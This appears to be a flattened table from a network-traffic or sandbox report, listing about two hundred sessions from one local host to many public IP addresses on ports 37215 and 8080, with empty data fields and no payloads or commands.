                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5646192.168.2.2346948197.60.94.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5647192.168.2.2334920168.154.140.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5648192.168.2.2335572157.191.72.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5649192.168.2.235407841.85.51.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5650192.168.2.235565887.115.231.3537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5651192.168.2.2344608197.42.147.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5652192.168.2.2355020157.162.101.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5653192.168.2.2343050157.227.127.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5654192.168.2.235419441.69.8.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5655192.168.2.2352394157.142.13.23537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5656192.168.2.2333318197.65.181.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5657192.168.2.2355852157.155.14.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5658192.168.2.2340656157.118.220.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5659192.168.2.2334154157.90.185.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5660192.168.2.2333928114.184.24.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5661192.168.2.2340858197.217.207.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5662192.168.2.2338790197.196.234.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5663192.168.2.235698441.55.222.5337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5664192.168.2.2340940197.225.171.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5665192.168.2.234083041.191.170.16237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5666192.168.2.2356196157.187.67.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5667192.168.2.235157041.59.24.16437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5668192.168.2.234264641.40.225.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5669192.168.2.235066641.174.69.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5670192.168.2.2338474134.34.60.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5671192.168.2.2353030197.3.36.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5672192.168.2.2342902191.239.88.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5673192.168.2.2360296157.88.94.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5674192.168.2.235771842.14.40.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5675192.168.2.2347788197.177.235.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5676192.168.2.2340348157.19.190.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5677192.168.2.2340022197.141.121.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5678192.168.2.2335354114.174.112.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5679192.168.2.2336582197.86.67.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5680192.168.2.2339906157.206.59.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5681192.168.2.2356274157.243.254.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5682192.168.2.2357548197.109.12.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5683192.168.2.2334272157.7.240.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5684192.168.2.2350532157.34.237.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5685192.168.2.2350196197.27.41.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5686192.168.2.2353746197.9.116.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5687192.168.2.233295241.24.213.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5688192.168.2.2360810197.176.70.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5689192.168.2.2356244157.81.130.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5690192.168.2.2338142197.89.179.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5691192.168.2.233333466.31.210.437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5692192.168.2.236079041.242.218.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5693192.168.2.2342340157.170.89.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5694192.168.2.2360302157.84.31.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5695192.168.2.2360702157.119.165.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5696192.168.2.235908274.40.170.3637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5697192.168.2.2337900157.12.161.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5698192.168.2.2334778119.53.111.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5699192.168.2.2333150102.245.157.3637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5700192.168.2.2352122219.80.29.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5701192.168.2.2339282197.104.249.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5702192.168.2.2349042197.236.18.17037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5703192.168.2.235951071.5.29.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5704192.168.2.2356228151.66.118.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5705192.168.2.2339546197.49.139.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5706192.168.2.233955641.13.173.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5707192.168.2.2343800197.48.41.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5708192.168.2.2346330157.183.115.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5709192.168.2.2342634157.236.15.18937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5710192.168.2.2355352132.238.100.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5711192.168.2.2337106157.222.146.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5712192.168.2.2347042157.154.93.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5713192.168.2.2340756157.37.57.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5714192.168.2.235122837.249.128.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5715192.168.2.2354094157.76.4.17037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5716192.168.2.2338022197.142.192.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5717192.168.2.2346886103.117.38.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5718192.168.2.234254480.192.117.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5719192.168.2.2336500137.49.227.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5720192.168.2.2359866157.237.210.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5721192.168.2.235511041.229.59.5337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5722192.168.2.235425241.144.97.10037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5723192.168.2.235993454.3.185.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5724192.168.2.235624875.209.92.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5725192.168.2.2341242197.14.202.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5726192.168.2.234192884.72.9.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5727192.168.2.234357241.141.152.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5728192.168.2.2345048197.24.215.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5729192.168.2.2342662197.208.143.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5730192.168.2.234674241.28.53.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5731192.168.2.2356976197.182.155.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5732192.168.2.2358508167.12.120.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5733192.168.2.2335784157.165.103.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5734192.168.2.2337424157.15.211.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5735192.168.2.2356978157.55.124.3637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5736192.168.2.234117241.167.101.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5737192.168.2.2335980197.34.115.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5738192.168.2.234114241.185.145.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5739192.168.2.234215049.196.142.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5740192.168.2.2360088197.198.132.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5741192.168.2.2342320197.52.120.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5742192.168.2.2360380197.242.180.5537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5743192.168.2.235584817.10.63.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5744192.168.2.2354956124.137.106.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5745192.168.2.2354648213.81.76.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5746192.168.2.235638818.48.33.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5747192.168.2.2336252168.113.207.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5748192.168.2.235066674.223.56.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5749192.168.2.234105635.172.144.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5750192.168.2.234438483.229.242.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5751192.168.2.234032060.216.6.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5752192.168.2.233938671.198.12.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5753192.168.2.233671657.144.185.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5754192.168.2.2351580139.182.198.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5755192.168.2.233436248.145.131.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5756192.168.2.2357554207.72.14.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5757192.168.2.2355694125.112.158.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5758192.168.2.235800827.66.217.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5759192.168.2.2346856198.248.3.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5760192.168.2.2335492121.124.117.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5761192.168.2.2339416112.42.182.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5762192.168.2.2333216211.214.197.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5763192.168.2.2351334102.117.151.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5764192.168.2.234341244.127.106.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5765192.168.2.235188084.250.190.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5766192.168.2.233746264.24.38.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5767192.168.2.2341966156.32.47.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5768192.168.2.2336322142.100.46.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5769192.168.2.2339440201.163.189.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5770192.168.2.2356956199.22.240.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5771192.168.2.2359032156.33.86.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5772192.168.2.2339018197.218.186.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5773192.168.2.2347610197.203.29.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5774192.168.2.235801023.115.12.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5775192.168.2.235806412.236.221.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5776192.168.2.235952449.94.105.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5777192.168.2.2355776107.228.26.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5778192.168.2.2335706144.204.238.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5779192.168.2.2333534155.80.87.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5780192.168.2.235201048.219.169.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5781192.168.2.2349036106.208.116.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5782192.168.2.2359074159.170.158.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5783192.168.2.235287676.40.114.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5784192.168.2.234437025.141.70.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5785192.168.2.2345626114.190.71.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5786192.168.2.233853239.158.19.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5787192.168.2.234370472.232.193.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5788192.168.2.2345836202.62.197.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5789192.168.2.2347382120.239.31.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5790192.168.2.234082234.199.139.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5791192.168.2.2356294210.74.81.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5792192.168.2.2340616147.27.135.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5793192.168.2.2359774139.200.36.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5794192.168.2.2358074115.76.187.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5795192.168.2.2339194213.116.193.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5796192.168.2.2359500156.219.181.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5797192.168.2.2345458114.65.187.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5798192.168.2.233782412.239.193.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5799192.168.2.234894662.253.110.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5800192.168.2.2356316207.4.178.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5801192.168.2.2347018113.99.131.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5802192.168.2.2343676118.156.145.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5803192.168.2.2358848118.47.215.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5804192.168.2.2359748209.101.157.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5805192.168.2.234254262.60.34.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5806192.168.2.2336102185.60.121.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5807192.168.2.235891694.187.209.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5808192.168.2.2345308196.236.190.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5809192.168.2.235615257.77.186.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5810192.168.2.234872099.73.115.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5811192.168.2.234769653.156.64.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5812192.168.2.2340872193.103.181.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5813192.168.2.2349058175.135.220.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5814192.168.2.235393239.13.190.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5815192.168.2.234944879.179.123.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5816192.168.2.233363072.39.214.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5817192.168.2.233456032.7.234.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5818192.168.2.233345442.213.249.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5819192.168.2.2345534192.194.196.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5820192.168.2.2358148207.31.41.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5821192.168.2.234194469.22.13.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5822192.168.2.2348386221.191.146.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5823192.168.2.234046848.217.20.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5824192.168.2.233546448.254.202.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5825192.168.2.2349112199.181.91.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5826192.168.2.2336156169.141.241.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5827192.168.2.234209446.86.21.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5828192.168.2.2344774195.63.184.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5829192.168.2.2340324101.237.19.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5830192.168.2.2350974156.18.113.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5831192.168.2.233626065.30.101.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5832192.168.2.2351824146.20.173.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5833192.168.2.2341958143.230.145.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5834192.168.2.233688848.73.246.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5835192.168.2.235540257.16.229.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5836192.168.2.2348874196.235.57.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5837192.168.2.2355254137.179.206.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5838192.168.2.2346904130.233.163.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5839192.168.2.233333264.57.16.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5840192.168.2.2352424219.15.109.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5841192.168.2.2360830143.21.146.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5842192.168.2.2356506204.110.139.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5843192.168.2.2338518213.4.1.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5844192.168.2.2346358128.210.182.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5845192.168.2.2360826190.9.188.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5846192.168.2.2343880106.87.213.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5847192.168.2.234719213.132.57.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5848192.168.2.233920299.247.170.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5849192.168.2.234552288.77.214.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5850192.168.2.2334686213.95.225.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5851192.168.2.2334104148.37.69.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5852192.168.2.235097438.64.247.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5853192.168.2.234578079.123.21.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5854192.168.2.234993643.18.123.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5855192.168.2.2353856216.126.225.588080
                                                        TimestampBytes transferredDirectionData

